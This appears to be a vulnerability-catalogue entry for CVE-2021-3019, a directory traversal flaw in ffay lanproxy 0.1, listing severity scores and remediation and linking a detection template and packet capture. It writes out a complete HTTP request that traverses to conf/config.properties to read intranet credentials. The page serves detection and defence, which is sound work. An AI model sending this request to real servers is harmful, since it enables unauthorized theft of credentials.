🔙 목록으로 돌아가기

CVE-2021-3019: ffay lanproxy Directory Traversal

Titleffay lanproxy Directory Traversal
Authorpikpikcu
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
RemediationApply the latest patch or upgrade to a version that has fixed the vulnerability.
CVSS Score7.5
EPSS Score0.92483
CVE IDCVE-2021-3019
CWE IDCWE-22
Tags cve2021 cve lanproxy lfi lanproxy_project vuln

🔍 Vulnerability Description

ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.

🌐 HTTP Request

GET /../conf/config.properties HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3019.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3019.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A